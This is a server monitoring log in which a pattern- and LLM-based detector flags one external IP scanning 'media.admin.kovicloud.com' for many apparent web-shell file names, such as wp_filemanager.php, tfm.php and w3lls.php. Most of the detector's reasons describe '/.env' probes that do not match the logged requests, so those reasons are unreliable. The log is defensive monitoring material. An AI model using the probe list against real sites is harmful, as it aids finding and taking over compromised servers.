Mar 20 09:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:02:31.935179 [observer] Patterns: hash=3338 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:03:01.936593 [observer] Pipeline: processed=3412 pattern_hits=3342 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:03:01.936787 [observer] Patterns: hash=3342 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:03:31.942202 [observer] Pipeline: processed=3414 pattern_hits=3344 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:03:31.942225 [observer] Patterns: hash=3344 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:04:01.952010 [observer] Pipeline: processed=3416 pattern_hits=3346 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:04:01.952046 [observer] Patterns: hash=3346 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:04:31.935210 [observer] Pipeline: processed=3420 pattern_hits=3350 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:04:31.935236 [observer] Patterns: hash=3350 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:05:01.968177 [observer] Pipeline: processed=3422 pattern_hits=3352 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:05:01.968212 [observer] Patterns: hash=3352 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:05:31.934073 [observer] Pipeline: processed=3426 pattern_hits=3356 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:05:31.934097 [observer] Patterns: hash=3356 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:06:01.965683 [observer] Pipeline: processed=3428 pattern_hits=3358 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:06:01.965718 [observer] Patterns: hash=3358 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:06:31.933930 [observer] Pipeline: processed=3432 pattern_hits=3362 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:06:31.933957 [observer] Patterns: hash=3362 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:07:01.977242 [observer] Pipeline: processed=3436 pattern_hits=3366 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:07:01.977269 [observer] Patterns: hash=3366 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:07:31.953638 [observer] Pipeline: processed=3438 pattern_hits=3368 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:07:31.953666 [observer] Patterns: hash=3368 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:08:01.951829 [observer] Pipeline: processed=3442 pattern_hits=3372 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:08:01.951954 [observer] Patterns: hash=3372 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:08:31.943668 [observer] Pipeline: processed=3444 pattern_hits=3374 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:08:31.943697 [observer] Patterns: hash=3374 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:09:01.953287 [observer] Pipeline: processed=3448 pattern_hits=3378 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:09:01.953320 [observer] Patterns: hash=3378 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:09:31.942332 [observer] Pipeline: processed=3450 pattern_hits=3380 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:09:31.942358 [observer] Patterns: hash=3380 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:10:01.963151 [observer] Pipeline: processed=3454 pattern_hits=3384 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:10:01.963218 [observer] Patterns: hash=3384 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:10:31.941832 [observer] Pipeline: processed=3456 pattern_hits=3386 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:10:31.941857 [observer] Patterns: hash=3386 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:01.937847 [observer] Pipeline: processed=3458 pattern_hits=3388 llm_calls=70 llm_errors=0 learned=0
Mar 20 09:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:01.938200 [observer] Patterns: hash=3388 prefix=0 regex=0 contains=0 deny=13 alert=42 suppress=0 misses=70
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.261495 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.261241128Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.501623 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:29.501326175Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.591011 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.590709126Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-blogs.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.660122 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:29.659883348Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /wp-blogs.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.734674 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.734093724Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET //tfm.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.802290 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:29.801989619Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET //tfm.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.872126 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:29.871655476Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /8xyz.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:29.939526 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:29.939258963Z 20.220.232.240 - - [20/Mar/2026:09:11:29 +0000] "media.admin.kovicloud.com" "GET /8xyz.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.007818 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.007118309Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /RIP.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.075069 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.074761455Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /RIP.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.142712 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.142411197Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ioxi.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.210530 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.210257675Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ioxi.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.277722 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.277468173Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /nc4.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.345530 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.345291860Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /nc4.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.413034 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.412785677Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-ssfc.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.480850 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.480383856Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-ssfc.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:30.551582 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.551303618Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws75.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:31.936964 [observer] Pipeline: processed=3480 pattern_hits=3409 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:31.936988 [observer] Patterns: hash=3409 prefix=0 regex=0 contains=0 deny=13 alert=59 suppress=0 misses=71
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.379831 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.379880 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:30.650209958Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws75.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380036 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.730431213Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws78.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380073 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:30.799786867Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /ws78.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380101 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:30.900390780Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-png.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380130 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:30.982242423Z 20.220.232.240 - - [20/Mar/2026:09:11:30 +0000] "media.admin.kovicloud.com" "GET /wp-png.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380183 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.049516590Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /000.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380216 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.117391229Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /000.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380246 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.184459947Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /w3lls.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380276 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.252488052Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /w3lls.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380303 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.322782364Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ws86.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380330 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:31.393665992Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ws86.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380356 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.461470627Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xwx1.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380402 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.529510083Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xwx1.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380434 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.596566770Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ggb.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.664242125Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ggb.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380483 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.732239538Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xff.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380508 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.800016841Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xff.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380533 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.867264173Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /wwx.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380554 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.935240442Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /wwx.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380575 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.002506863Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /term.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380596 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.070294811Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /term.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380732 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.137898348Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /ws77.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380761 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:32.207067887Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /ws77.php HTTP/1.1" 400 143 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380784 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.275558055Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /gifclass.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380806 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.344885413Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /gifclass.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380827 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.412052175Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /8.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380893 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.481656536Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /8.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380919 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.548939139Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /155.php HTTP/1.1" 302 138 "-" "-" "-"
